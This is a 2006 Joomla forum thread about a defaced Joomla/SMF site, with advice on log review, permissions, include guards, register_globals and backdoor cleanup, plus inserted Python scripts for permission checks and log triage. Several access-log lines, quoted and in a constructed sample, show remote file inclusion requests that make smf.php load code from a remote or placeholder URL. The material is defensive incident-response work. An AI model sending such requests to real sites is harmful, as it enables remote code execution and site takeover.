The Joomla! Forum ™
PostPosted: Wed Jul 12, 2006 10:28 am 
Hello,

One of the members of my site's team reported this log from our IRC channel to me:

Quote:
are you there?
I don't know if you at #nintendopt know,
but your site has been hacked,
probably an exploit in the forum.
I think I should come and warn you...
http://imageh4ck.com/images/Equalizer/nin02.jpg
http://www.nintendopt.com/portal/syst.html
If you already knew and have already fixed the flaw, sorry for the bother.


Some strange things happened recently in the forum with the old shoutbox (Ultimate Shoutbox v1.32). The shoutbox was filled with shouts that had no nick and contained only dots, and the "View all" link pointed to a strange page. McAfee also alerted me about a virus.

I'm using this software:

Forum:
SMF 1.1 RC2
SMF Shoutbox 1.04 
SMF Arcade 1.2.4b
Spoiler Tag 0.2.3
Ultimate Shoutbox 1.32

Portal:
Joomla! 1.0.10

Components:
AkoComment 2.0
ArtBanners 1.6
Banners 1.0.0
gigCalendar 1.0
Mass Mail 4.5.1
News Feeds 1.0.0
Polls
RD RSS 1.0.0
Simple Machines Forum Registration 1.1.5 (upgraded yesterday)
SMF Bridge 1.1.5 (upgraded yesterday)
Syndicate 1.0
Web Links 1.0
zOOm Media Gallery 2.5.1 RC1

Mambots:
AkoCommentBot 2.0
Code support 1.0
Email Cloaking 1.0
GeSHi 1.0.4
Imbed PHP 2.0
Load Module Positions 1.0.0
SEF 1.0.0
MOS Image Editor Button 1.0.0
MOS Pagebreak Editor Button 1.0.0
Search Categories 1.0.0
Search gigCalendar 1.0
Search Newsfeeds 1.0
Search Sections 1.0
SMF_header_include 1.1.5

Modules:
mod_artbanners1 1.7
mod_banners 1.0.0
mod_gigcal_minical 1.0
mod_gigcal_upcom 1.0
mod_latestnews 1.0.0
mod_lettermansubscribe
mod_mainmenu 1.0.0
mod_mostread 1.0.0
mod_newsflash 1.0.0
mod_poll 1.0.0
mod_random_image 1.0.0
mod_related_items 1.0.0
mod_search 1.0.0
mod_smf_login 1.1.5
mod_smf_Poll 1.0
mod_smf_recentTopics 1.0
mod_stats 1.0.0
mod_templatechooser 1.0.0
mod_whosonline 1.0.0
mod_wrapper 1.0.0
mod_zoom_menue 1b002
mod_zoom_pics 2b234
mod_latest 1.0.0
mod_logged 1.0.0
mod_popular 1.0.0
mod_stats 1.0.0

Could it also be a problem with the server?

Please help me!


PostPosted: Wed Jul 12, 2006 11:13 am
What did the hack look like?
What was the damage?
Do you have any components installed besides the listed software, anything still installed but not active?


PostPosted: Wed Jul 12, 2006 12:29 pm
Anything installed is in the post. Nothing was damaged, it seems to be only a warning. This is what he did: http://www.nintendopt.com/portal/syst.html
He also created a folder on my ftp server and apparently could access the Joomla Admin Panel.


PostPosted: Wed Jul 12, 2006 12:37 pm
Moving thread to "Security" board.

_________________
Kenneth Crowder - Omaha, Nebraska, USA
Global Moderator - Joomla! ...because open source matters
Recipes for people with food allergies: http://intolerantoffspring.com
Author of "Joomla! 1.5: Developing Secure Sites": http://www.lynda.com/home/DisplayCourse.aspx?lpk2=73559


PostPosted: Wed Jul 12, 2006 1:17 pm
Quote:
Some strange things happened recently in the forum with the old shoutbox (Ultimate Shoutbox v1.32). The shoutbox was filled with shouts that had no nick and contained only dots, and the "View all" link pointed to a strange page. McAfee also alerted me about a virus.


Just an assumption: since the strange things occurred in the shoutbox first, there is a big chance that it was used as the doorway.

Quote:
http://www.nintendopt.com/portal/syst.html


Determine if this was generated using scripts from your host or has been uploaded via FTP. Check the HTML's modified date and search the raw logs for the same date and time. From there you will find clues.

Quote:
http://imageh4ck.com/images/Equalizer/nin02.jpg


Did this screenshot come from the hacker's view, or from the one who reported it?

Also, the hacker who defaced some of your pages is a member of a virtual hacking game, which they claim is a non-real hacking game. In their rules, they do not want their members to hack in real-life situations.

Google the hacker's handle and you will find what I mean.

_________________
http://isulong.seoph.uenian.org/


PostPosted: Wed Jul 12, 2006 2:06 pm
Quote:
Determine if this is generated using scripts from you host or has been uploaded via FTP. Check the HTML's modified date and search for raw logs with same date and time. From there you will find clues.

How can I know if it was uploaded to the server? I've found some entries with the file and folder name in the Raw Access Log.

Quote:
Did this screenshot come from the hacker's view, or from the one who reported it?

I had access to it from the guy in the IRC. It's probably from the hacker. Does this mean he knows my password? How did I have access to it?

How can I prevent future situations?


PostPosted: Wed Jul 12, 2006 2:38 pm
The purpose of determining "how did that html file get into your site" is to know how the hacker got in.

If that file was generated using your own scripts then you will have a hard time figuring out which script is the culprit.

If the file was uploaded via FTP or SSH then the hacker obviously knows your hosting login details.

If the file was neither generated by scripts nor uploaded, then we can assume that the hacker is hosted on the same host you are on and has used custom scripts to read and write to other accounts within the hosting network. These network vulnerabilities are caused by improper configuration at your host.

And since the hacker has a screenshot of the admin interface logged into your account, that means he knows your Joomla login details or, worse, used a password with the same hash as your hashed password.

You can prevent this from happening again once you discover how the hacker got in.

You might want to change your hosting login details, Joomla login details and database details.

And be sure to check if the hacker didn't leave any backdoors (usually scripts accessible via URL) so he can get back into your box again and again without having to provide login details.

PostPosted: Wed Jul 12, 2006 3:19 pm
Astig wrote:
The purpose of determining "how did that html file get into your site" is to know how the hacker got in.

If that file was generated using your own scripts then you will have a hard time figuring out which script is the culprit.

If the file was uploaded via FTP or SSH then the hacker obviously knows your hosting login details.

If the file was neither generated by scripts nor uploaded, then we can assume that the hacker is hosted on the same host you are on and has used custom scripts to read and write to other accounts within the hosting network. These network vulnerabilities are caused by improper configuration at your host.

And since the hacker has a screenshot of the admin interface logged into your account, that means he knows your Joomla login details or, worse, used a password with the same hash as your hashed password.

You can prevent this from happening again once you discover how the hacker got in.

You might want to change your hosting login details, Joomla login details and database details.

And be sure to check if the hacker didn't leave any backdoors (usually scripts accessible via URL) so he can get back into your box again and again without having to provide login details.


Take a look:

Quote:
85.240.255.60 - - [08/Jul/2006:06:09:41 -0500] "GET /portal/syst.html HTTP/1.1" 200 5654 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3"

This is the first entry related to the hack I found in the log.

How can I know if he has left any backdoor?

The problem may be the software, no? I mean, outdated versions.

He may have my database now. Does he have access to the members' passwords? What other problems may this cause?


PostPosted: Wed Jul 12, 2006 3:30 pm
Rule of thumb: keep up to date. Since this is a new vulnerability for some components, it is advisable to lock down your files and folders.

Basic permissions should be the following:
Alter the permissions to CHMOD 644 for files and 755 for folders. To install new modules, mambots or components, you need to change your permissions back to writable (777) again.

What about 3rd party addons (components, modules, mambots)?

If you are using any components that do not come bundled with mambo or joomla then it is advised to look in the php files for that component and make sure that it contains


/** ensure this file is being included by a parent file and stop direct linking */
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

towards the very top of the file (usually underneath the file comments).


What about Register Globals ON or OFF?
Register globals should also be turned off if possible. Mambo or Joomla has the ability to emulate register globals on if necessary.

Continue reading this article for more updates - http://www.hardworking.com/technology/c ... _site.html

good luck and keep us posted.
em

_________________
[ http://www.MOSCOM.COM ] WebHosting 24x7 Phone Support.
[ http://www.KING.NET ] My Project ... converting to 1.6


Last edited by thewatcher on Wed Jul 12, 2006 3:46 pm, edited 1 time in total.

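The two checks from the post above (644/755 permissions and the _VALID_MOS guard) run over a site tree, as an added Python example that is not from the thread or from the Joomla project; the miniature site that build_demo creates is constructed and its file names are assumed.

```python
import os
import re
import stat
import tempfile
from pathlib import Path

# A PHP file is fine if it either sets _VALID_MOS (an entry point such as index.php)
# or checks it with the defined(...) or die(...) guard quoted in the post.
GUARD_RE = re.compile(r"""(?:defined|define)\s*\(\s*['"]_VALID_MOS['"]""")
FILE_MODE, DIR_MODE = 0o644, 0o755

def permission_issues(root):
    """(relative path, octal mode, world-writable?) for every path whose mode is not
    644 for files or 755 for directories, as the post recommends."""
    root = Path(root)
    issues = []
    for p in sorted(root.rglob("*")):
        mode = stat.S_IMODE(p.lstat().st_mode)
        want = DIR_MODE if p.is_dir() else FILE_MODE
        if mode != want:
            issues.append((p.relative_to(root).as_posix(), oct(mode), bool(mode & stat.S_IWOTH)))
    return issues

def unguarded_php(root, head_lines=40):
    """PHP files whose first head_lines lines carry neither define('_VALID_MOS', ...)
    nor the defined('_VALID_MOS') or die(...) guard; each one listed needs a look."""
    root = Path(root)
    found = []
    for p in sorted(root.rglob("*.php")):
        with open(p, encoding="utf-8", errors="replace") as f:
            head = "".join(f.readline() for _ in range(head_lines))
        if not GUARD_RE.search(head):
            found.append(p.relative_to(root).as_posix())
    return found

def build_demo():
    """Constructed miniature site (assumed names, not a real Joomla tree): one component
    carries the guard, one does not, and one install left 777/666 modes behind."""
    base = Path(tempfile.mkdtemp())
    files = {
        "index.php": "<?php\ndefine('_VALID_MOS', 1);\nrequire_once 'includes/joomla.php';\n",
        "components/com_good/good.php":
            "<?php\n/** ensure this file is being included by a parent file */\n"
            "defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );\n",
        "components/com_bad/bad.php": "<?php\necho 'no guard here';\n",
    }
    for rel, body in files.items():
        p = base / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(body)
        os.chmod(p, FILE_MODE)
    for d in base.rglob("*"):
        if d.is_dir():
            os.chmod(d, DIR_MODE)
    os.chmod(base / "components/com_bad", 0o777)        # left writable after installing
    os.chmod(base / "components/com_bad/bad.php", 0o666)
    return base

if __name__ == "__main__":
    site = build_demo()
    print("mode problems:", permission_issues(site))
    print("unguarded PHP:", unguarded_php(site))
```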
 
PostPosted: Wed Jul 12, 2006 3:43 pm 
thewatcher wrote:
If you are using any components that do not come bundled with mambo


erm  ;)


PostPosted: Wed Jul 12, 2006 3:45 pm
hvanleeuwen wrote:
thewatcher wrote:
If you are using any components that do not come bundled with mambo


erm  ;)


hahaha, I meant Joomla.

PostPosted: Wed Jul 12, 2006 4:20 pm
I changed the chmod in Global configuration -> Server.

I think the hacker "entered" by the shoutbox, so shouldn't I do something in the forum?

Quote:
What about 3rd party addons (components, modules, mambots)?

If you are using any components that do not come bundled with mambo then it is advised to look in the php files for that component and make sure that it contains


/** ensure this file is being included by a parent file and stop direct linking */
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

towards the very top of the file (usually underneath the file comments).

In ALL 3rd party addon files?
Quote:
What about Register Globals ON or OFF?
Register globals should also be turned off if possible. Mambo or Joomla has the ability to emulate register globals on if necessary.

Huh?  ???


PostPosted: Wed Jul 12, 2006 4:23 pm
If you can't add this to your .htaccess file

php_flag register_globals off

continue checking this article for other security and permission settings.
http://www.hardworking.com/technology/c ... _site.html

regards,
em

PostPosted: Wed Jul 12, 2006 4:33 pm
thewatcher wrote:
If you can't add this to your .htaccess file

php_flag register_globals off

continue checking this article for other security and permission settings.
http://www.hardworking.com/technology/c ... _site.html

regards,
em


But where should I register globals off, in the Joomla panel?
I will check it monday. I'm going on holiday tomorrow and today it's my birthday (yeah, the hack was a present  >:()

I checked the folders in the FTP and they don't have the chmod I set!

I'm trying to delete the files the hacker put in the server but I can't!!


Last edited by tL0z on Wed Jul 12, 2006 5:15 pm, edited 1 time in total.

PostPosted: Wed Jul 12, 2006 5:32 pm
Enjoy your vacation and b-day, relax for a bit.

;D

PostPosted: Mon Jul 17, 2006 10:16 pm
Hello, I'm back  :D

I've talked to the hacker and he told me he did it just for fun, he didn't want to destroy anything.
I've already changed the passwords. However, I think he still has access to the FTP because he deleted the files he created, help!


PostPosted: Mon Jul 17, 2006 11:15 pm
Is the hacker Portuguese?  :P

The hacker is...?

Well, pay attention to your hosting.

Check what your hosting is; actually, the datacenter is probably the shoddy one, but I don't know, I'm just saying...


PostPosted: Tue Jul 18, 2006 8:18 am
how did you turn on this multilanguage feature?


PostPosted: Tue Jul 18, 2006 8:45 am
powerPT wrote:
Is the hacker Portuguese?  :P

The hacker is...?

Well, pay attention to your hosting.

Check what your hosting is; actually, the datacenter is probably the shoddy one, but I don't know, I'm just saying...

Yes it is.
I don't think the problem is on the host. The hacker told me he entered by the shoutbox.

Astig wrote:
And be sure to check if the hacker didn't leave any backdoors (usually scripts accessible via URL) so he can get back into your box again and again without having to provide login details.
How can I check that?


PostPosted: Tue Jul 18, 2006 8:50 am
hvanleeuwen wrote:
how did you turn on this multilanguage feature?


I'm also Portuguese  :D :P


PostPosted: Tue Jul 18, 2006 10:34 am
Ah, so that's the trick ;)


PostPosted: Tue Jul 18, 2006 4:22 pm
hi!

there is an smf-bridge exploit running through the web.

in my access-log there are many entries like

/component/option,com_smf/Itemid,28/components/com_smf/smf.php?mosConfig_absolute_path=http://URLEDITFORSECURITYREASONS/list.txt

or e.g.

/component/option,com_smf/components/com_smf/smf.php?mosConfig_absolute_path=http://URLEDITFORSECURITYREASONS/e4.php

is there a security hole in the bridge and if so, which versions are affected?

regards
Markus

PS: i also posted into smf-board: http://www.simplemachines.org/community ... 97#p648997


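The log triage Astig suggested earlier in the thread (line up the HTML file's modified date with the raw access log) and a check for the remote-include requests shown in the post above, as an added Python example that is not from the thread or from the Joomla project. The sample log is constructed with documentation addresses and a placeholder host, and the check looks at every query parameter rather than only mosConfig_absolute_path.

```python
import os
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" log format, the layout of the line quoted earlier in the thread.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

# Constructed sample (documentation IPs, placeholder host); not the thread's real log.
SAMPLE_LOG = """\
203.0.113.7 - - [08/Jul/2006:06:03:12 -0500] "GET /portal/components/com_smf/smf.php?mosConfig_absolute_path=http://example.invalid/e4.php HTTP/1.1" 200 311 "-" "libwww-perl/5.805"
203.0.113.7 - - [08/Jul/2006:06:04:55 -0500] "GET /portal/index.php?option=com_smf HTTP/1.1" 200 9044 "-" "libwww-perl/5.805"
192.0.2.60 - - [08/Jul/2006:06:09:41 -0500] "GET /portal/syst.html HTTP/1.1" 200 5654 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1)"
192.0.2.9 - - [09/Jul/2006:12:00:00 -0500] "GET /portal/index.php HTTP/1.1" 200 12000 "-" "Mozilla/5.0"
"""

def log_time(text):
    """Parse a log timestamp such as '08/Jul/2006:06:09:41 -0500' into an aware datetime."""
    return datetime.strptime(text, TS_FMT)

def mtime_of(path):
    """A file's modification time as an aware datetime, the value to look for in the log."""
    return datetime.fromtimestamp(os.stat(path).st_mtime, tz=timezone.utc)

def parse_line(line):
    """One combined-format line as a dict (ts parsed, status as int), or None if no match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = log_time(rec["ts"])
    rec["status"] = int(rec["status"])
    return rec

def remote_include_params(target):
    """Query parameters whose value is a remote URL. The thread shows the
    mosConfig_absolute_path case; this checks every parameter name."""
    return [(k, v) for k, v in parse_qsl(urlsplit(target).query, keep_blank_values=True)
            if v.lower().startswith(REMOTE_SCHEMES)]

def triage(log_text, file_mtime, window_minutes=10):
    """Remote-include attempts plus every request within +/- window_minutes of file_mtime."""
    rfi, near = [], []
    window = timedelta(minutes=window_minutes)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = remote_include_params(rec["target"])
        if hits:
            rfi.append({"ip": rec["ip"], "ts": rec["ts"], "params": hits})
        if abs(rec["ts"] - file_mtime) <= window:
            near.append(rec)
    return {"rfi": rfi, "near": near}

if __name__ == "__main__":
    result = triage(SAMPLE_LOG, log_time("08/Jul/2006:06:09:41 -0500"))
    print("remote include attempts:", [(h["ip"], h["params"]) for h in result["rfi"]])
    print("requests near the file's mtime:", [(r["ip"], r["target"]) for r in result["near"]])
```

On a real site, pass mtime_of("path/to/syst.html") instead of the literal timestamp and feed the raw access log text to triage.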
 
PostPosted: Wed Jul 19, 2006 8:58 pm 
tL0z wrote:
Astig wrote:
And be sure to check if the hacker didn't leave any backdoors (usually scripts accessible via URL) so he can get back into your box again and again without having to provide login details.

How can I check that?

Help!


PostPosted: Wed Jul 19, 2006 9:04 pm
http://forum.joomla.org/index.php/topic,75376.0.html

should be enough to keep the hacker out.


PostPosted: Fri Jul 21, 2006 10:17 am
And what about the backdoor?


PostPosted: Fri Jul 21, 2006 11:08 am
Well if you have been hacked and that hacker did leave a backdoor open, then you would have to clean your house and remove the backdoor or switch locks.

I guess if I were an inexperienced and slightly paranoid user I would rebuild the entire website.
I would make a copy of the current one, then install the Joomla version that was installed again and let it use the existing database, thus keeping all data; then I would copy the template back and reinstall all the extras I used.

It's drastic but probably the only way of really knowing you have no hacker stuff on your Joomla site.


PostPosted: Fri Jul 21, 2006 12:33 pm
Can't it be removed by an antivirus scan by the hoster?


PostPosted: Fri Jul 21, 2006 12:55 pm
Very unlikely, since it's usually not a virus as such; besides, I assume your hoster already does virus scans on all necessary servers.

No offence, but it is obvious you have no idea what this is all about. Don't you know someone you trust who has the capabilities to help you out with this? It's not rocket science and usually the problem isn't as big as you might think it is.


PostPosted: Fri Jul 21, 2006 10:27 pm
I'm afraid not :(

But what is a backdoor? Some code inserted on a file? How can it be detected?


PostPosted: Sat Jul 22, 2006 6:57 am
I'm no expert, but I guess you will usually be quite safe if the files on your server are the same as the files in the original Joomla zipped file, and the same goes for the installed extensions. Any file that is on your server and not in your originals can be what the hacker left behind. Make sure you empty all your cache files and use your brain!

change your passwords too

Another thing to look at is the file timestamps: if there are files that were changed at the time you got hacked and you are sure they weren't changed by you, they might be hacker-modified.

Again, don't get too paranoid; usually it's just some script kiddie that defaced your website. Unless your website is some interesting e-commerce site or something, you won't be an interesting site for them, just a site for their ranking stats.

What is the url to your site anyway?


 